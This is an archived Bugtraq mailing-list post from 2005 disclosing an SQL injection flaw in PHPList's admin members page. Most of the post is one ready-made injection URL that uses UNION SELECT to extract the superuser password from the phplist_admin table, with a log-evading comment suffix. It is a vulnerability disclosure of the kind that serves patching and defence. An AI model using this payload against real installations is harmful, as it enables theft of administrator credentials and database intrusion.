[40033] in bugtraq

home help back first fref pref prev next nref lref last post

PHPList Vunerability

daemon@ATHENA.MIT.EDU (ziot@whataboutpp.com)
Mon Aug 1 12:37:18 2005

Date: 31 Jul 2005 23:02:38 -0000
Message-ID: <20050731230238.22060.qmail@securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
From: ziot@whataboutpp.com
To: bugtraq@securityfocus.com

http://example.com/lists/admin/?page=members&id=1%20union%20select%20null,password,null,null%20from%20phplist_admin%20where%20superuser=1/*sp_password

Although not completely open because one must authenticate, but completely leaves the database open.. thus being a SQL Injection hole.


home help back first fref pref prev next nref lref last post